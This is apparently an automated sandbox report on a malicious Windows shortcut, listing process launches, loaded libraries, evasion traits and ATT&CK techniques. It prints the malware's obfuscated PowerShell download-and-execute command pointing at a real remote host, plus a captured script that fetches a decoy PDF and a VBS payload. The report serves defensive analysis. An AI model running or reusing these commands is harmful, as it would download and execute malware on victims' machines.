      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1760,i,5841402874270245853,5687332266173655936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: 0bNBLjPn56.lnkLNK file: ..\..\..\..\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2269740507.0000027DEE1D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2269229094.0000027DEDF4F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbe35 source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2353829592.0000026B1BAD5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbP%tn source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEDFEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbbP source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEE015000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb# source: powershell.exe, 00000002.00000002.2451470735.0000026B35E4E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEE015000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbk source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbment.Automation.pdbn# source: powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb= source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))

      Persistence and Installation Behavior

      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htctewww.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.pdf';getit -fz $flol -oulv 'http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs';exit[Environment]::GetEnvironmentVariable('public') + '\\iys.vbs'@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", 
"New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin", "Get-Clipboard", "Set-Clipboard", "Get-ComputerInfo", "Get-TimeZone", "Set-TimeZone")CompatiblePSEditions = @('Desktop','Core')} if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") { $myinv = $_.InvocationInfo if ($myinv -and $myinv.MyCommand)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5417
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4347
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3304
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 673
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304 | Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 | Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 | Thread sleep count: 3304 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 | Thread sleep count: 673 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7132 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: svchost.exe, 0000000B.00000002.3460971612.000001EA0D454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.3459077045.000001EA07E2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_2744.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2744, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ${kilo4z} = $pshome;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'a' + ${kilo4z}[-66 +55];${o5d.} = $([type]${*opso25.});${*.f2iuzg.} = ${o5d.}::tostring(+79 -1 -5)+${o5d.}::tostring(+79 -1 -5 -4)+${o5d.}::tostring(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -usebasicparsing'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      MITRE ATT&CK matrix, one line per tactic (cells in the report's order; numeric prefixes reproduced as shown in the report):
      Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties
      Resource Development: 1 Scripting | Domains | DNS Server | Virtual Private Server | Server | Botnet
      Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media
      Execution: 11 Command and Scripting Interpreter | 1 PowerShell | At | Cron | Launchd | Scheduled Task
      Persistence: 1 Scripting | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Login Hook | Network Logon Script | RC Scripts
      Privilege Escalation: 11 Process Injection | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Login Hook | Network Logon Script | RC Scripts
      Defense Evasion: 11 Masquerading | 31 Virtualization/Sandbox Evasion | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 DLL Side-Loading | Steganography
